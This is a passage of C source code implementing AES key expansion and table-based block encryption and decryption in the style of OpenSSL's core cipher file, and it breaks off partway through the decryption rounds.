*/ int AES_set_encrypt_key(const unsigned char *userKey, const int bits, AES_KEY *key) { u32 *rk; int i = 0; u32 temp; if (!userKey || !key) return -1; if (bits != 128 && bits != 192 && bits != 256) return -2; rk = key->rd_key; if (bits==128) key->rounds = 10; else if (bits==192) key->rounds = 12; else key->rounds = 14; rk[0] = GETU32(userKey ); rk[1] = GETU32(userKey + 4); rk[2] = GETU32(userKey + 8); rk[3] = GETU32(userKey + 12); if (bits == 128) { while (1) { temp = rk[3]; rk[4] = rk[0] ^ (AES_Te4[(temp >> 16) & 0xff] & 0xff000000) ^ (AES_Te4[(temp >> 8) & 0xff] & 0x00ff0000) ^ (AES_Te4[(temp ) & 0xff] & 0x0000ff00) ^ (AES_Te4[(temp >> 24) ] & 0x000000ff) ^ rcon[i]; rk[5] = rk[1] ^ rk[4]; rk[6] = rk[2] ^ rk[5]; rk[7] = rk[3] ^ rk[6]; if (++i == 10) { return 0; } rk += 4; } } rk[4] = GETU32(userKey + 16); rk[5] = GETU32(userKey + 20); if (bits == 192) { while (1) { temp = rk[ 5]; rk[ 6] = rk[ 0] ^ (AES_Te4[(temp >> 16) & 0xff] & 0xff000000) ^ (AES_Te4[(temp >> 8) & 0xff] & 0x00ff0000) ^ (AES_Te4[(temp ) & 0xff] & 0x0000ff00) ^ (AES_Te4[(temp >> 24) ] & 0x000000ff) ^ rcon[i]; rk[ 7] = rk[ 1] ^ rk[ 6]; rk[ 8] = rk[ 2] ^ rk[ 7]; rk[ 9] = rk[ 3] ^ rk[ 8]; if (++i == 8) { return 0; } rk[10] = rk[ 4] ^ rk[ 9]; rk[11] = rk[ 5] ^ rk[10]; rk += 6; } } rk[6] = GETU32(userKey + 24); rk[7] = GETU32(userKey + 28); if (bits == 256) { while (1) { temp = rk[ 7]; rk[ 8] = rk[ 0] ^ (AES_Te4[(temp >> 16) & 0xff] & 0xff000000) ^ (AES_Te4[(temp >> 8) & 0xff] & 0x00ff0000) ^ (AES_Te4[(temp ) & 0xff] & 0x0000ff00) ^ (AES_Te4[(temp >> 24) ] & 0x000000ff) ^ rcon[i]; rk[ 9] = rk[ 1] ^ rk[ 8]; rk[10] = rk[ 2] ^ rk[ 9]; rk[11] = rk[ 3] ^ rk[10]; if (++i == 7) { return 0; } temp = rk[11]; rk[12] = rk[ 4] ^ (AES_Te4[(temp >> 24) ] & 0xff000000) ^ (AES_Te4[(temp >> 16) & 0xff] & 0x00ff0000) ^ (AES_Te4[(temp >> 8) & 0xff] & 0x0000ff00) ^ (AES_Te4[(temp ) & 0xff] & 0x000000ff); rk[13] = rk[ 5] ^ rk[12]; rk[14] = rk[ 6] ^ rk[13]; rk[15] = rk[ 7] ^ rk[14]; rk += 8; } } abort(); } /** * Expand the cipher key into the decryption key schedule. 
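 *
 * (Clarifying addition, not part of the original comment: the decryption
 * schedule is the encryption schedule with the round keys reversed and
 * the inverse MixColumns transform applied to every round key except the
 * first and the last. The AES_Td*[AES_Te4[...] & 0xff] composition used
 * below cancels the S-box lookup baked into the Td tables, leaving just
 * InvMixColumns of each round-key word.)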
*/ int AES_set_decrypt_key(const unsigned char *userKey, const int bits, AES_KEY *key) { u32 *rk; int i, j, status; u32 temp; /* first, start with an encryption schedule */ status = AES_set_encrypt_key(userKey, bits, key); if (status < 0) return status; rk = key->rd_key; /* invert the order of the round keys: */ for (i = 0, j = 4*(key->rounds); i < j; i += 4, j -= 4) { temp = rk[i ]; rk[i ] = rk[j ]; rk[j ] = temp; temp = rk[i + 1]; rk[i + 1] = rk[j + 1]; rk[j + 1] = temp; temp = rk[i + 2]; rk[i + 2] = rk[j + 2]; rk[j + 2] = temp; temp = rk[i + 3]; rk[i + 3] = rk[j + 3]; rk[j + 3] = temp; } /* apply the inverse MixColumn transform to all round keys but the first and the last: */ for (i = 1; i < (key->rounds); i++) { rk += 4; rk[0] = AES_Td0[AES_Te4[(rk[0] >> 24) ] & 0xff] ^ AES_Td1[AES_Te4[(rk[0] >> 16) & 0xff] & 0xff] ^ AES_Td2[AES_Te4[(rk[0] >> 8) & 0xff] & 0xff] ^ AES_Td3[AES_Te4[(rk[0] ) & 0xff] & 0xff]; rk[1] = AES_Td0[AES_Te4[(rk[1] >> 24) ] & 0xff] ^ AES_Td1[AES_Te4[(rk[1] >> 16) & 0xff] & 0xff] ^ AES_Td2[AES_Te4[(rk[1] >> 8) & 0xff] & 0xff] ^ AES_Td3[AES_Te4[(rk[1] ) & 0xff] & 0xff]; rk[2] = AES_Td0[AES_Te4[(rk[2] >> 24) ] & 0xff] ^ AES_Td1[AES_Te4[(rk[2] >> 16) & 0xff] & 0xff] ^ AES_Td2[AES_Te4[(rk[2] >> 8) & 0xff] & 0xff] ^ AES_Td3[AES_Te4[(rk[2] ) & 0xff] & 0xff]; rk[3] = AES_Td0[AES_Te4[(rk[3] >> 24) ] & 0xff] ^ AES_Td1[AES_Te4[(rk[3] >> 16) & 0xff] & 0xff] ^ AES_Td2[AES_Te4[(rk[3] >> 8) & 0xff] & 0xff] ^ AES_Td3[AES_Te4[(rk[3] ) & 0xff] & 0xff]; } return 0; } #ifndef AES_ASM /* * Encrypt a single block * in and out can overlap */ void AES_encrypt(const unsigned char *in, unsigned char *out, const AES_KEY *key) { const u32 *rk; u32 s0, s1, s2, s3, t0, t1, t2, t3; #ifndef FULL_UNROLL int r; #endif /* ?FULL_UNROLL */ assert(in && out && key); rk = key->rd_key; /* * map byte array block to cipher state * and add initial round key: */ s0 = GETU32(in ) ^ rk[0]; s1 = GETU32(in + 4) ^ rk[1]; s2 = GETU32(in + 8) ^ rk[2]; s3 = GETU32(in + 12) ^ rk[3]; #ifdef FULL_UNROLL /* round 1: */ t0 = AES_Te0[s0 >> 24] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[s3 & 0xff] ^ rk[ 4]; t1 = AES_Te0[s1 >> 24] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[s0 & 0xff] ^ rk[ 5]; t2 = AES_Te0[s2 >> 24] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[s1 & 0xff] ^ rk[ 6]; t3 = AES_Te0[s3 >> 24] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[s2 & 0xff] ^ rk[ 7]; /* round 2: */ s0 = AES_Te0[t0 >> 24] ^ AES_Te1[(t1 >> 16) & 0xff] ^ AES_Te2[(t2 >> 8) & 0xff] ^ AES_Te3[t3 & 0xff] ^ rk[ 8]; s1 = AES_Te0[t1 >> 24] ^ AES_Te1[(t2 >> 16) & 0xff] ^ AES_Te2[(t3 >> 8) & 0xff] ^ AES_Te3[t0 & 0xff] ^ rk[ 9]; s2 = AES_Te0[t2 >> 24] ^ AES_Te1[(t3 >> 16) & 0xff] ^ AES_Te2[(t0 >> 8) & 0xff] ^ AES_Te3[t1 & 0xff] ^ rk[10]; s3 = AES_Te0[t3 >> 24] ^ AES_Te1[(t0 >> 16) & 0xff] ^ AES_Te2[(t1 >> 8) & 0xff] ^ AES_Te3[t2 & 0xff] ^ rk[11]; /* round 3: */ t0 = AES_Te0[s0 >> 24] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[s3 & 0xff] ^ rk[12]; t1 = AES_Te0[s1 >> 24] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[s0 & 0xff] ^ rk[13]; t2 = AES_Te0[s2 >> 24] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[s1 & 0xff] ^ rk[14]; t3 = AES_Te0[s3 >> 24] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[s2 & 0xff] ^ rk[15]; /* round 4: */ s0 = AES_Te0[t0 >> 24] ^ AES_Te1[(t1 >> 16) & 0xff] ^ AES_Te2[(t2 >> 8) & 0xff] ^ AES_Te3[t3 & 0xff] ^ rk[16]; s1 = AES_Te0[t1 >> 24] ^ AES_Te1[(t2 >> 16) 
& 0xff] ^ AES_Te2[(t3 >> 8) & 0xff] ^ AES_Te3[t0 & 0xff] ^ rk[17]; s2 = AES_Te0[t2 >> 24] ^ AES_Te1[(t3 >> 16) & 0xff] ^ AES_Te2[(t0 >> 8) & 0xff] ^ AES_Te3[t1 & 0xff] ^ rk[18]; s3 = AES_Te0[t3 >> 24] ^ AES_Te1[(t0 >> 16) & 0xff] ^ AES_Te2[(t1 >> 8) & 0xff] ^ AES_Te3[t2 & 0xff] ^ rk[19]; /* round 5: */ t0 = AES_Te0[s0 >> 24] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[s3 & 0xff] ^ rk[20]; t1 = AES_Te0[s1 >> 24] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[s0 & 0xff] ^ rk[21]; t2 = AES_Te0[s2 >> 24] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[s1 & 0xff] ^ rk[22]; t3 = AES_Te0[s3 >> 24] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[s2 & 0xff] ^ rk[23]; /* round 6: */ s0 = AES_Te0[t0 >> 24] ^ AES_Te1[(t1 >> 16) & 0xff] ^ AES_Te2[(t2 >> 8) & 0xff] ^ AES_Te3[t3 & 0xff] ^ rk[24]; s1 = AES_Te0[t1 >> 24] ^ AES_Te1[(t2 >> 16) & 0xff] ^ AES_Te2[(t3 >> 8) & 0xff] ^ AES_Te3[t0 & 0xff] ^ rk[25]; s2 = AES_Te0[t2 >> 24] ^ AES_Te1[(t3 >> 16) & 0xff] ^ AES_Te2[(t0 >> 8) & 0xff] ^ AES_Te3[t1 & 0xff] ^ rk[26]; s3 = AES_Te0[t3 >> 24] ^ AES_Te1[(t0 >> 16) & 0xff] ^ AES_Te2[(t1 >> 8) & 0xff] ^ AES_Te3[t2 & 0xff] ^ rk[27]; /* round 7: */ t0 = AES_Te0[s0 >> 24] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[s3 & 0xff] ^ rk[28]; t1 = AES_Te0[s1 >> 24] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[s0 & 0xff] ^ rk[29]; t2 = AES_Te0[s2 >> 24] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[s1 & 0xff] ^ rk[30]; t3 = AES_Te0[s3 >> 24] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[s2 & 0xff] ^ rk[31]; /* round 8: */ s0 = AES_Te0[t0 >> 24] ^ AES_Te1[(t1 >> 16) & 0xff] ^ AES_Te2[(t2 >> 8) & 0xff] ^ AES_Te3[t3 & 0xff] ^ rk[32]; s1 = AES_Te0[t1 >> 24] ^ AES_Te1[(t2 >> 16) & 0xff] ^ AES_Te2[(t3 >> 8) & 0xff] ^ AES_Te3[t0 & 0xff] ^ rk[33]; s2 = AES_Te0[t2 >> 24] ^ AES_Te1[(t3 >> 16) & 0xff] ^ AES_Te2[(t0 >> 8) & 0xff] ^ AES_Te3[t1 & 0xff] ^ rk[34]; s3 = AES_Te0[t3 >> 24] ^ AES_Te1[(t0 >> 16) & 0xff] ^ AES_Te2[(t1 >> 8) & 0xff] ^ AES_Te3[t2 & 0xff] ^ rk[35]; /* round 9: */ t0 = AES_Te0[s0 >> 24] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[s3 & 0xff] ^ rk[36]; t1 = AES_Te0[s1 >> 24] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[s0 & 0xff] ^ rk[37]; t2 = AES_Te0[s2 >> 24] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[s1 & 0xff] ^ rk[38]; t3 = AES_Te0[s3 >> 24] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[s2 & 0xff] ^ rk[39]; if (key->rounds > 10) { /* round 10: */ s0 = AES_Te0[t0 >> 24] ^ AES_Te1[(t1 >> 16) & 0xff] ^ AES_Te2[(t2 >> 8) & 0xff] ^ AES_Te3[t3 & 0xff] ^ rk[40]; s1 = AES_Te0[t1 >> 24] ^ AES_Te1[(t2 >> 16) & 0xff] ^ AES_Te2[(t3 >> 8) & 0xff] ^ AES_Te3[t0 & 0xff] ^ rk[41]; s2 = AES_Te0[t2 >> 24] ^ AES_Te1[(t3 >> 16) & 0xff] ^ AES_Te2[(t0 >> 8) & 0xff] ^ AES_Te3[t1 & 0xff] ^ rk[42]; s3 = AES_Te0[t3 >> 24] ^ AES_Te1[(t0 >> 16) & 0xff] ^ AES_Te2[(t1 >> 8) & 0xff] ^ AES_Te3[t2 & 0xff] ^ rk[43]; /* round 11: */ t0 = AES_Te0[s0 >> 24] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[s3 & 0xff] ^ rk[44]; t1 = AES_Te0[s1 >> 24] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[s0 & 0xff] ^ rk[45]; t2 = AES_Te0[s2 >> 24] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[s1 & 0xff] ^ rk[46]; t3 = AES_Te0[s3 >> 24] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[s2 & 0xff] ^ rk[47]; if (key->rounds > 12) { /* 
round 12: */ s0 = AES_Te0[t0 >> 24] ^ AES_Te1[(t1 >> 16) & 0xff] ^ AES_Te2[(t2 >> 8) & 0xff] ^ AES_Te3[t3 & 0xff] ^ rk[48]; s1 = AES_Te0[t1 >> 24] ^ AES_Te1[(t2 >> 16) & 0xff] ^ AES_Te2[(t3 >> 8) & 0xff] ^ AES_Te3[t0 & 0xff] ^ rk[49]; s2 = AES_Te0[t2 >> 24] ^ AES_Te1[(t3 >> 16) & 0xff] ^ AES_Te2[(t0 >> 8) & 0xff] ^ AES_Te3[t1 & 0xff] ^ rk[50]; s3 = AES_Te0[t3 >> 24] ^ AES_Te1[(t0 >> 16) & 0xff] ^ AES_Te2[(t1 >> 8) & 0xff] ^ AES_Te3[t2 & 0xff] ^ rk[51]; /* round 13: */ t0 = AES_Te0[s0 >> 24] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[s3 & 0xff] ^ rk[52]; t1 = AES_Te0[s1 >> 24] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[s0 & 0xff] ^ rk[53]; t2 = AES_Te0[s2 >> 24] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[s1 & 0xff] ^ rk[54]; t3 = AES_Te0[s3 >> 24] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[s2 & 0xff] ^ rk[55]; } } rk += key->rounds << 2; #else /* !FULL_UNROLL */ /* * Nr - 1 full rounds: */ r = key->rounds >> 1; for (;;) { t0 = AES_Te0[(s0 >> 24) ] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[(s3 ) & 0xff] ^ rk[4]; t1 = AES_Te0[(s1 >> 24) ] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[(s0 ) & 0xff] ^ rk[5]; t2 = AES_Te0[(s2 >> 24) ] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[(s1 ) & 0xff] ^ rk[6]; t3 = AES_Te0[(s3 >> 24) ] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[(s2 ) & 0xff] ^ rk[7]; rk += 8; if (--r == 0) { break; } s0 = AES_Te0[(t0 >> 24) ] ^ AES_Te1[(t1 >> 16) & 0xff] ^ AES_Te2[(t2 >> 8) & 0xff] ^ AES_Te3[(t3 ) & 0xff] ^ rk[0]; s1 = AES_Te0[(t1 >> 24) ] ^ AES_Te1[(t2 >> 16) & 0xff] ^ AES_Te2[(t3 >> 8) & 0xff] ^ AES_Te3[(t0 ) & 0xff] ^ rk[1]; s2 = AES_Te0[(t2 >> 24) ] ^ AES_Te1[(t3 >> 16) & 0xff] ^ AES_Te2[(t0 >> 8) & 0xff] ^ AES_Te3[(t1 ) & 0xff] ^ rk[2]; s3 = AES_Te0[(t3 >> 24) ] ^ AES_Te1[(t0 >> 16) & 0xff] ^ AES_Te2[(t1 >> 8) & 0xff] ^ AES_Te3[(t2 ) & 0xff] ^ rk[3]; } #endif /* ?FULL_UNROLL */ /* * apply last round and * map cipher state to byte array block: */ s0 = (AES_Te4[(t0 >> 24) ] & 0xff000000) ^ (AES_Te4[(t1 >> 16) & 0xff] & 0x00ff0000) ^ (AES_Te4[(t2 >> 8) & 0xff] & 0x0000ff00) ^ (AES_Te4[(t3 ) & 0xff] & 0x000000ff) ^ rk[0]; PUTU32(out , s0); s1 = (AES_Te4[(t1 >> 24) ] & 0xff000000) ^ (AES_Te4[(t2 >> 16) & 0xff] & 0x00ff0000) ^ (AES_Te4[(t3 >> 8) & 0xff] & 0x0000ff00) ^ (AES_Te4[(t0 ) & 0xff] & 0x000000ff) ^ rk[1]; PUTU32(out + 4, s1); s2 = (AES_Te4[(t2 >> 24) ] & 0xff000000) ^ (AES_Te4[(t3 >> 16) & 0xff] & 0x00ff0000) ^ (AES_Te4[(t0 >> 8) & 0xff] & 0x0000ff00) ^ (AES_Te4[(t1 ) & 0xff] & 0x000000ff) ^ rk[2]; PUTU32(out + 8, s2); s3 = (AES_Te4[(t3 >> 24) ] & 0xff000000) ^ (AES_Te4[(t0 >> 16) & 0xff] & 0x00ff0000) ^ (AES_Te4[(t1 >> 8) & 0xff] & 0x0000ff00) ^ (AES_Te4[(t2 ) & 0xff] & 0x000000ff) ^ rk[3]; PUTU32(out + 12, s3); } /* * Decrypt a single block * in and out can overlap */ void AES_decrypt(const unsigned char *in, unsigned char *out, const AES_KEY *key) { const u32 *rk; u32 s0, s1, s2, s3, t0, t1, t2, t3; #ifndef FULL_UNROLL int r; #endif /* ?FULL_UNROLL */ assert(in && out && key); rk = key->rd_key; /* * map byte array block to cipher state * and add initial round key: */ s0 = GETU32(in ) ^ rk[0]; s1 = GETU32(in + 4) ^ rk[1]; s2 = GETU32(in + 8) ^ rk[2]; s3 = GETU32(in + 12) ^ rk[3]; #ifdef FULL_UNROLL /* round 1: */ t0 = AES_Td0[s0 >> 24] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[s1 & 0xff] ^ rk[ 4]; t1 = AES_Td0[s1 >> 24] ^ AES_Td1[(s0 >> 16) & 0xff] ^ 
AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[s2 & 0xff] ^ rk[ 5]; t2 = AES_Td0[s2 >> 24] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[s3 & 0xff] ^ rk[ 6]; t3 = AES_Td0[s3 >> 24] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[s0 & 0xff] ^ rk[ 7]; /* round 2: */ s0 = AES_Td0[t0 >> 24] ^ AES_Td1[(t3 >> 16) & 0xff] ^ AES_Td2[(t2 >> 8) & 0xff] ^ AES_Td3[t1 & 0xff] ^ rk[ 8]; s1 = AES_Td0[t1 >> 24] ^ AES_Td1[(t0 >> 16) & 0xff] ^ AES_Td2[(t3 >> 8) & 0xff] ^ AES_Td3[t2 & 0xff] ^ rk[ 9]; s2 = AES_Td0[t2 >> 24] ^ AES_Td1[(t1 >> 16) & 0xff] ^ AES_Td2[(t0 >> 8) & 0xff] ^ AES_Td3[t3 & 0xff] ^ rk[10]; s3 = AES_Td0[t3 >> 24] ^ AES_Td1[(t2 >> 16) & 0xff] ^ AES_Td2[(t1 >> 8) & 0xff] ^ AES_Td3[t0 & 0xff] ^ rk[11]; /* round 3: */ t0 = AES_Td0[s0 >> 24] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[s1 & 0xff] ^ rk[12]; t1 = AES_Td0[s1 >> 24] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[s2 & 0xff] ^ rk[13]; t2 = AES_Td0[s2 >> 24] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[s3 & 0xff] ^ rk[14]; t3 = AES_Td0[s3 >> 24] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[s0 & 0xff] ^ rk[15]; /* round 4: */ s0 = AES_Td0[t0 >> 24] ^ AES_Td1[(t3 >> 16) & 0xff] ^ AES_Td2[(t2 >> 8) & 0xff] ^ AES_Td3[t1 & 0xff] ^ rk[16]; s1 = AES_Td0[t1 >> 24] ^ AES_Td1[(t0 >> 16) & 0xff] ^ AES_Td2[(t3 >> 8) & 0xff] ^ AES_Td3[t2 & 0xff] ^ rk[17]; s2 = AES_Td0[t2 >> 24] ^ AES_Td1[(t1 >> 16) & 0xff] ^ AES_Td2[(t0 >> 8) & 0xff] ^ AES_Td3[t3 & 0xff] ^ rk[18]; s3 = AES_Td0[t3 >> 24] ^ AES_Td1[(t2 >> 16) & 0xff] ^ AES_Td2[(t1 >> 8) & 0xff] ^ AES_Td3[t0 & 0xff] ^ rk[19]; /* round 5: */ t0 = AES_Td0[s0 >> 24] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[s1 & 0xff] ^ rk[20]; t1 = AES_Td0[s1 >> 24] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[s2 & 0xff] ^ rk[21]; t2 = AES_Td0[s2 >> 24] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[s3 & 0xff] ^ rk[22]; t3 = AES_Td0[s3 >> 24] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[s0 & 0xff] ^ rk[23]; /* round 6: */ s0 = AES_Td0[t0 >> 24] ^ AES_Td1[(t3 >> 16) & 0xff] ^ AES_Td2[(t2 >> 8) & 0xff] ^ AES_Td3[t1 & 0xff] ^ rk[24]; s1 = AES_Td0[t1 >> 24] ^ AES_Td1[(t0 >> 16) & 0xff] ^ AES_Td2[(t3 >> 8) & 0xff] ^ AES_Td3[t2 & 0xff] ^ rk[25]; s2 = AES_Td0[t2 >> 24] ^ AES_Td1[(t1 >> 16) & 0xff] ^ AES_Td2[(t0 >> 8) & 0xff] ^ AES_Td3[t3 & 0xff] ^ rk[26]; s3 = AES_Td0[t3 >> 24] ^ AES_Td1[(t2 >> 16) & 0xff] ^ AES_Td2[(t1 >> 8) & 0xff] ^ AES_Td3[t0 & 0xff] ^ rk[27]; /* round 7: */ t0 = AES_Td0[s0 >> 24] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[s1 & 0xff] ^ rk[28]; t1 = AES_Td0[s1 >> 24] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[s2 & 0xff] ^ rk[29]; t2 = AES_Td0[s2 >> 24] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[s3 & 0xff] ^ rk[30]; t3 = AES_Td0[s3 >> 24] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[s0 & 0xff] ^ rk[31]; /* round 8: */ s0 = AES_Td0[t0 >> 24] ^ AES_Td1[(t3 >> 16) & 0xff] ^ AES_Td2[(t2 >> 8) & 0xff] ^ AES_Td3[t1 & 0xff] ^ rk[32]; s1 = AES_Td0[t1 >> 24] ^ AES_Td1[(t0 >> 16) & 0xff] ^ AES_Td2[(t3 >> 8) & 0xff] ^ AES_Td3[t2 & 0xff] ^ rk[33]; s2 = AES_Td0[t2 >> 24] ^ AES_Td1[(t1 >> 16) & 0xff] ^ AES_Td2[(t0 >> 8) & 0xff] ^ AES_Td3[t3 & 0xff] ^ rk[34]; s3 = AES_Td0[t3 >> 24] ^ AES_Td1[(t2 >> 16) & 0xff] ^ AES_Td2[(t1 >> 8) & 0xff] ^ AES_Td3[t0 & 0xff] ^ rk[35]; /* round 9: */ t0 = AES_Td0[s0 >> 24] ^ AES_Td1[(s3 >> 16) & 
0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[s1 & 0xff] ^ rk[36]; t1 = AES_Td0[s1 >> 24] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[s2 & 0xff] ^ rk[37]; t2 = AES_Td0[s2 >> 24] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[s3 & 0xff] ^ rk[38]; t3 = AES_Td0[s3 >> 24] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[s0 & 0xff] ^ rk[39]; if (key->rounds > 10) { /* round 10: */ s0 = AES_Td0[t0 >> 24] ^ AES_Td1[(t3 >> 16) & 0xff] ^ AES_Td2[(t2 >> 8) & 0xff] ^ AES_Td3[t1 & 0xff] ^ rk[40]; s1 = AES_Td0[t1 >> 24] ^ AES_Td1[(t0 >> 16) & 0xff] ^ AES_Td2[(t3 >> 8) & 0xff] ^ AES_Td3[t2 & 0xff] ^ rk[41]; s2 = AES_Td0[t2 >> 24] ^ AES_Td1[(t1 >> 16) & 0xff] ^ AES_Td2[(t0 >> 8) & 0xff] ^ AES_Td3[t3 & 0xff] ^ rk[42]; s3 = AES_Td0[t3 >> 24] ^ AES_Td1[(t2 >> 16) & 0xff] ^ AES_Td2[(t1 >> 8) & 0xff] ^ AES_Td3[t0 & 0xff] ^ rk[43]; /* round 11: */ t0 = AES_Td0[s0 >> 24] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[s1 & 0xff] ^ rk[44]; t1 = AES_Td0[s1 >> 24] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[s2 & 0xff] ^ rk[45]; t2 = AES_Td0[s2 >> 24] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[s3 & 0xff] ^ rk[46]; t3 = AES_Td0[s3 >> 24] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[s0 & 0xff] ^ rk[47]; if (key->rounds > 12) { /* round 12: */ s0 = AES_Td0[t0 >> 24] ^ AES_Td1[(t3 >> 16) & 0xff] ^ AES_Td2[(t2 >> 8) & 0xff] ^ AES_Td3[t1 & 0xff] ^ rk[48]; s1 = AES_Td0[t1 >> 24] ^ AES_Td1[(t0 >> 16) & 0xff] ^ AES_Td2[(t3 >> 8) & 0xff] ^ AES_Td3[t2 & 0xff] ^ rk[49]; s2 = AES_Td0[t2 >> 24] ^ AES_Td1[(t1 >> 16) & 0xff] ^ AES_Td2[(t0 >> 8) & 0xff] ^ AES_Td3[t3 & 0xff] ^ rk[50]; s3 = AES_Td0[t3 >> 24] ^ AES_Td1[(t2 >> 16) & 0xff] ^ AES_Td2[(t1 >> 8) & 0xff] ^ AES_Td3[t0 & 0xff] ^ rk[51]; /* round 13: */ t0 = AES_Td0[s0 >> 24] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[s1 & 0xff] ^ rk[52]; t1 = AES_Td0[s1 >> 24] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[s2 & 0xff] ^ rk[53]; t2 = AES_Td0[s2 >> 24] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[s3 & 0xff] ^ rk[54]; t3 = AES_Td0[s3 >> 